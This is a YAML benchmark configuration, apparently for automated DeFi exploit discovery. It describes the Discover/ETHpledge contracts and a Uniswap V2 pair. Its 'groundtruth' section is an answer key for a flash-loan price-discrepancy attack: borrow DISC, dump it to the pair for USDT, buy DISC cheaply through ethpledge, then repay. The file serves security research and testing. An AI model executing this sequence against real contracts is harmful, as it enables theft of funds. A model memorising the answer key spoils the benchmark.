# Information for benchmarks building.
project_name: "Discover"

ctrt_name2cls:
  - ["usdt", "USDT"]
  - ["disc", "Discover"]
  - ["pair", "UniswapV2Pair"]
  - ["factory", "UniswapV2Factory"]
  - ["router", "UniswapV2Router"]
  - ["ethpledge", "ETHpledge"]

ctrt_name2deploy:
  - ["usdt", ""]
  - ["disc", "new Discover()"]
  - ["pair", ""]
  - ["factory", ""]
  - ["router", ""]
  - [
      "ethpledge",
      "new ETHpledge(
      address(usdt),
      address(disc),
      address(0xdead), address(0xdead), address(pair))",
    ]

extra_actions:
  - "function swap_ethpledge_attacker_usdt_disc(uint256 amount, uint256 amountOut) internal eurus {
    usdt.approve(address(ethpledge), UINT256_MAX);
    ethpledge.pledgein(amount);
    }"

extra_deployments: []
extra_statements: []

attack_goal_str: "usdt"

groundtruth:
  - ["borrow", "disc", "owner", "24000e18"]
  - ["swap", "pair", "attacker", "disc", "usdt", "disc.balanceOf(attacker)", "pair.getAmountOut(disc.balanceOf(attacker), address(disc))"]
  - ["swap", "ethpledge", "attacker", "usdt", "disc", "5000e18", "1"]
  - ["payback", "disc", "owner", "24000e18 * 1003 / 1000"]

# Information for search space building.
roles:
  "usdt":
    is_asset: true
    is_erc20: true
    is_stablecoin: true
  "disc":
    is_asset: true
    is_erc20: true
    is_stablecoin: false
  "pair":
    is_swappair: true
    is_uniswap: true
    token_pair: ["usdt", "disc"]
    support_swaps:
      "usdt": ["disc", "usdt"]
      "disc": ["disc", "usdt"]
    is_oracle: true
    oracle: "pair"
    is_lendpool: true
  "ethpledge":
    is_swappair: true
    token_pair: ["usdt", "disc"]
    support_swaps:
      "usdt": ["disc", "usdt"]
      "disc": ["disc"]

pattern: "Price Discrepancy"
